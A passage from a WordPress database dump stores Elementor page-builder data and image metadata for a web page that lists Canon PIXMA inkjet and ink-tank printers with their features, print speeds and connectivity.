]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One with Fax for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan\\u00a0 Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"29fd978d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"38034358\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fbf6246\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Printer :-<\\/h3>\\r\\n<table>\\r\\n<tbody>\\r\\n<tr>\\r\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2345\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\\\" alt=\\\"\\\" width=\\\"362\\\" height=\\\"320\\\" \\/>\\r\\n\\r\\n<strong>PIXMA E560 \\/ E560R<\\/strong>\\r\\n\\r\\nAdvanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing\\r\\n\\r\\nThe Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.\\r\\n\\r\\nAvailable in Black and Red.\\r\\n\\r\\nPrint, Scan, Copy\\r\\n\\r\\nISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour\\r\\n\\r\\nHi-speed USB 2.0, WiFi\\r\\n\\r\\nRecommended print volume: 80 - 400 pages\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]<\\/td>\\r\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2346\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\\\" alt=\\\"\\\" width=\\\"362\\\" height=\\\"320\\\" \\/>\\r\\n\\r\\n<strong>PIXMA E4270<\\/strong>\\r\\n\\r\\n<span style=\\\"font-family: inherit; font-size: inherit;\\\">Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/span>\\r\\n\\r\\nThis compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.\\r\\n\\r\\nPrint, Scan, Copy, Fax\\r\\n\\r\\nISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour\\r\\n\\r\\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct\\r\\n\\r\\nRecommended print volume: 50 - 200 pages\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]<\\/td>\\r\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2347\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\\\" alt=\\\"\\\" width=\\\"362\\\" height=\\\"320\\\" \\/>\\r\\n\\r\\n<strong>PIXMA TS9570<\\/strong>\\r\\n\\r\\nA3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder\\r\\n\\r\\nThis A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.\\r\\n\\r\\nPrint, Scan, Copy\\r\\n\\r\\nISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour\\r\\n\\r\\nHi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct\\r\\n\\r\\nRecommended print volume: 80 - 300 pages\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]<\\/td>\\r\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2348\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\\\" alt=\\\"\\\" width=\\\"362\\\" height=\\\"320\\\" \\/>\\r\\n\\r\\n<strong>PIXMA TS8270<\\/strong>\\r\\n\\r\\nWireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing\\r\\n\\r\\nThis advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.\\r\\n\\r\\nAvailable in Black, Red and White.\\r\\n\\r\\nPrint, Scan, Copy\\r\\n\\r\\nISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour\\r\\n\\r\\nHi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct\\r\\n\\r\\nRecommended print volume: 30 - 100 pages\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]<\\/td>\\r\\n<\\/tr>\\r\\n<tr>\\r\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2349\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\\\" alt=\\\"\\\" width=\\\"362\\\" height=\\\"320\\\" \\/>\\r\\n\\r\\n<strong>PIXM<span style=\\\"font-family: inherit; font-size: inherit;\\\">A<\\/span><span style=\\\"font-family: inherit; font-size: inherit;\\\">\\u00a0G2010<\\/span><\\/strong>\\r\\n\\r\\nRefillable Ink Tank All-In-One for High Volume Printing\\r\\n\\r\\nDesigned for high volume printing at low running cost\\r\\n\\r\\nPrint, Scan &amp; Copy\\r\\n\\r\\nISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour\\r\\n\\r\\nHi-speed USB 2.0\\r\\n\\r\\nRecommended print volume: 150 - 1500 pages\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]<\\/td>\\r\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2351\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\\\" alt=\\\"\\\" width=\\\"362\\\" height=\\\"320\\\" \\/>\\r\\n\\r\\n<strong>PIXMA G4010<\\/strong>\\r\\n\\r\\nRefillable Ink Tank Wireless All-In-One with Fax for High Volume Printing\\r\\n\\r\\nDesigned for high volume printing at low running cost.\\r\\n\\r\\nPrint, Scan, Copy and Fax\\r\\n\\r\\nISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour\\r\\n\\r\\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode\\r\\n\\r\\nRecommended print volume: 150 - 1500 pages\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]<\\/td>\\r\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2352\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\\\" alt=\\\"\\\" width=\\\"362\\\" height=\\\"320\\\" \\/>\\r\\n\\r\\n<strong>PIXMA G1010<\\/strong>\\r\\n\\r\\nRefillable Ink Tank Printer for High Volume Printing\\r\\n\\r\\nDesigned for high volume printing at low running cost\\r\\n\\r\\nPrint\\r\\n\\r\\nISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)\\r\\n\\r\\nPhoto Speed (4 x 6\\\"): 60sec. (borderless)\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]<\\/td>\\r\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2353\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-1.png\\\" alt=\\\"\\\" width=\\\"362\\\" height=\\\"320\\\" \\/>\\r\\n\\r\\n<strong>PIXMA G3010<\\/strong>\\r\\n\\r\\nRefillable Ink Tank Wireless All-In-One for High Volume Printing\\r\\n\\r\\nDesigned for high volume printing at low running cost\\r\\n\\r\\nPrint, Scan\\u00a0 Copy\\r\\n\\r\\nISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour\\r\\n\\r\\nHi-speed USB 2.0, WiFi, Mopria, Access Point Mode\\r\\n\\r\\nRecommended print volume: 150 - 1500 pages\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]<\\/td>\\r\\n<\\/tr>\\r\\n<\\/tbody>\\r\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3791,2716,'_elementor_version','0.4'),(3805,2718,'_elementor_version','0.4'),(3819,2720,'_elementor_version','0.4'),(3822,2721,'_wp_attached_file','2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png'),(3823,2721,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:362;s:6:\"height\";i:320;s:4:\"file\";s:53:\"2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"abbc0420f899426c86b9f547f8e0476d_g3010_01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:53:\"abbc0420f899426c86b9f547f8e0476d_g3010_01-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:53:\"abbc0420f899426c86b9f547f8e0476d_g3010_01-362x300.png\";s:5:\"width\";i:362;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:51:\"abbc0420f899426c86b9f547f8e0476d_g3010_01-20x18.png\";s:5:\"width\";i:20;s:6:\"height\";i:18;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3815,2720,'_wp_page_template','template-fullwidth.php'),(3816,2720,'_elementor_edit_mode','builder'),(3817,2720,'_elementor_template_type','post'),(3818,2720,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Printer :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p><br \\/>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p><br \\/>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p><br \\/>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3833,2723,'_wp_page_template','template-fullwidth.php'),(3834,2723,'_elementor_edit_mode','builder'),(3835,2723,'_elementor_template_type','post'),(3836,2723,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost 